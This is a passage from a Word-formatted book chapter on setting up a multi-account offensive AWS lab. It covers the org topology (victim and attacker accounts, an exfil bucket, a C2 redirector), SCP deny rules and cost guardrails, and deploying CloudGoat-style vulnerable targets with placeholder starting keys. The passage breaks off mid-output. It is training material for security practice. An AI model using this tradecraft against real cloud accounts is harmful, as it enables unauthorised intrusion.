      </w:r>
    </w:p>
    <w:p w14:paraId="6837D7B0"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Building an Offensive AWS Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A5899" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:spacing w:before="240" w:after="48"/>
        <w:outlineLvl w:val="4"/>
        <w:divId w:val="1425342661"/>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4205C15F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="1425342661"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Stand up a multi-account AWS lab where you can detonate the techniques in the rest of the book without risk to real data or real budgets. Cover Organizations layout, Service Control Policies as blast-radius guardrails, cost controls, CloudTrail on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> account, and the publicly available vulnerable-by-design Terraform projects the rest of the book assumes you have deployed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8208B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="lead"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">You will not learn AWS tradecraft by reading. You will learn it by getting a CloudFox output in front of you, running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam__privesc_scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> against an account you set up to be vulnerable, watching a Pacu attack succeed, and then watching CloudTrail catch it. This chapter is the minimum-viable lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6555D5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3.1  Lab topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499A7E0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lab is an AWS Organization with at least three accounts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E2C956" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Management (payer) account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Holds billing, SCPs, Organizations, and the CloudTrail organization trail. No workloads. Login is root-user-with-hardware-MFA only for the first setup, then deleted and recreated as an IAM Identity Center user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0552B173" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Victim OU.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> At least one "target" account — this is where you detonate CloudGoat, IAM Vulnerable, AWSGoat, TerraGoat. You will burn this account down regularly; automate re-creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E4E03" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Attacker account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Where you stage your operator credentials, your personal CloudFox / Pacu host (a fresh EC2), your exfil S3 bucket, and your lab Athena query workspace. This is the account that owns your Kali AMIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B39CA3"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AWS Organization · payer-acct · 11112222333</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Security O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>U</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logging-archiv</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 CloudTrail sin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>k</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objectlock + replicatio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Victim O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>U</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cloudgoat-targe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CloudGoat scenario</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iam-vulnerabl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privesc la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>b</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awsgoat-targe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EKS / Lambda / API Gatewa</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Attacker O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>U</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operator-workstatio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Kali AMI + Pacu / CloudFo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>x</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exfil-storag</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bucket, Athena workspac</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c2-contro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>l</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EventBridge + Lambda redirector</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Lab topology. Three OUs — Security, Victim, Attacker — each with the minimum accounts needed. The org trail in the Security OU logs every action in every child account. Repeatable teardown and rebuild of the Victim OU is automated with Terraform</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2F8CE0FF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3.2  Service Control Policies as blast-radius guardrails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA070E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lab must protect you from yourself. An SCP attached at the Organization root will prevent any principal in any child account from performing destructive operations you have not explicitly whitelisted. A minimal set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08190938"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43836A0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"Version": "2012-10-17",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23869F3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"Statement": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E964483"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65CF3F63"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"Sid": "DenyLeavingOrg",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABFA516"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"Effect": "Deny",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D1AF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"Action": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6FD3F0"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"organizations:LeaveOrganization",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13227B1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"organizations:AcceptHandshake"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD950E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2801EAE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"Resource": "*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9CE40C"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59E59B8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588CEEA6"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r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">   "Sid": "DenyDisableCloudTrail",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC3743"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"Effect": "Deny",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D0E0D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"Action": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DF68B"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"cloudtrail:StopLogging",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F7D79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"cloudtrail:DeleteTrail",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A166BF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"cloudtrail:PutEventSelectors"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4938878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18B3DA5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"Resource": "*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC6AC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"Condition": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2994C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"StringNotEquals": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753DAED8"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"aws:PrincipalArn":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A698DC7"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"arn:aws:iam::111122223333:role/OrgSecurityBreakglass"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E70E82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6C8615D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6F011A31"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1856CD7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5514942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"Sid": "DenyOutOfScopeRegions",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1184CB81"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"Effect": "Deny",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FC8D7"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"NotAction": ["iam:*","organizations:*","route53:*","cloudfront:*","support:*","sts:*"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7748A3B0"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"Resource": "*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BC90FF"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"Condition": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35135C6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"StringNotEquals": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CDC0F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"aws:RequestedRegion": ["us-east-1","us-west-2","eu-west-1"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A710891"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0D62830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1749BA60"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027FC10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7A1C0BD1"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20FE439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first statement keeps a compromised child account from leaving the org. The second preserves CloudTrail integrity. The third bounds the regions that can be touched at all, which doubles your recon speed and keeps your lab spend predictable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5572FF25" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3.3  Cost guardrails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B316B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An attacker's lab that detonates Pacu, Stratus Red Team, and CloudGoat in a continuous loop will quietly run up bills if unattended. Install the following on every account in the lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7C4ADE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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An AWS Budget at $50/mo per account with email + SNS notifications at 50/80/100 percent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77510A4D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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A daily </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DescribeInstances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lambda that terminates any instance older than 24 hours outside a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>keep=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag — important for the many CloudGoat scenarios that spin up EC2 instances you forget about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B051C49" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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An RDS shutdown schedule; most CloudGoat scenarios use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>db.t3.micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> but cumulative storage costs add up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1B2784" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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AWS Cost Anomaly Detection on the payer account, configured for the full org.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C7A455" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3.4  CloudTrail on the attacker account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF81F4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Counter-intuitive: the attacker account must have CloudTrail turned on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>for your own safety</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. You will be running Pacu, CloudFox, Stratus Red Team, Prowler, and custom Boto3 against your own credentials during research. You want to see your own attack-trail the way a defender will. Dual-purpose: you use your own attacker-account trail as the exemplar when writing detection queries for the victim account in Chapter 20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3DA4D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3.5  Vulnerable-by-design targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166AA62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Four open-source projects cover essentially every technique in this book.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1474C21F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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CloudGoat (Rhino Security Labs).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform-based. Individual "scenarios" (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam_privesc_by_attachment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cloud_breach_s3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2_ssrf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>) deploy a single-purpose vulnerable environment, give you the starting creds, and tear down on command. The canonical AWS pentest training ground.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E47C938" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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IAM Vulnerable (BishopFox).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A single Terraform deployment that creates the 31 canonical privilege-escalation paths in one account. Pairs beautifully with Pacu's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam__privesc_scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Chapter 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FF5EC3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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AWSGoat (INE Security).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Full modern-application attack surface — API Gateway, Lambda, DynamoDB, Cognito, ECS, S3 static hosting — pre-seeded with IDORs, SSRFs, and IAM misconfigurations that chain into AWS takeover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E30428" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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TerraGoat (Bridgecrew/Prisma).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Heavy on IaC misconfigurations; useful for Chapter 19 (CI/CD supply-chain) rather than pure runtime exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3523378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operator@kali:~/labs$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cloudgoat create iam_privesc_by_attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2316A524" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[cloudgoat] Starting...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CA2128" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[cloudgoat] Terraform init OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0366D586" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[cloudgoat] Apply: creating 17 resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1A2EED"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[cloudgoat] Apply complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56870B3E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[cloudgoat] Access keys written to scenarios/iam_privesc_by_attachment/start/access_keys.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C73EDD"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operator@kali:~/labs$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cat scenarios/iam_privesc_by_attachment/start/access_keys.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C368FF"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cloudgoat_output_aws_account_id   = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>555566667777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9FC7C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cloudgoat_output_cgidkittens_access_key_id = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AKIAEXAMPLEKITTEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BF8ED6"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cloudgoat_output_cgidkittens_secret_key    = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
